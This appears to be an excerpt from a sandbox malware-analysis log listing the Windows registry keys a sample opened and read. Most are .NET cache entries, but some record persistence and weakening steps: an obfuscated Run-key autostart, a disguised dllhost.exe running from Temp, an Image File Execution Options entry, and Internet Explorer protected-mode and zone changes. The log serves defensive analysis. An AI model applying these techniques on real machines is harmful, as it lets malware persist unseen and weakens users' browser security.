HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|dllhost.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|dllhost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|dllhost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3393a1ff\315f970
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3393a1ff\19562149
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4ad60644\6f323003
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\235dd0a9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\9e47f51
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x00FD76B72EDDF22127370785\xe3\x8c\xb7
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FD76B72EDDF22127370785.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|FD76B72EDDF22127370785|FD76B72EDDF22127370785.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|FD76B72EDDF22127370785|FD76B72EDDF22127370785.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|FD76B72EDDF22127370785|FD76B72EDDF22127370785.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
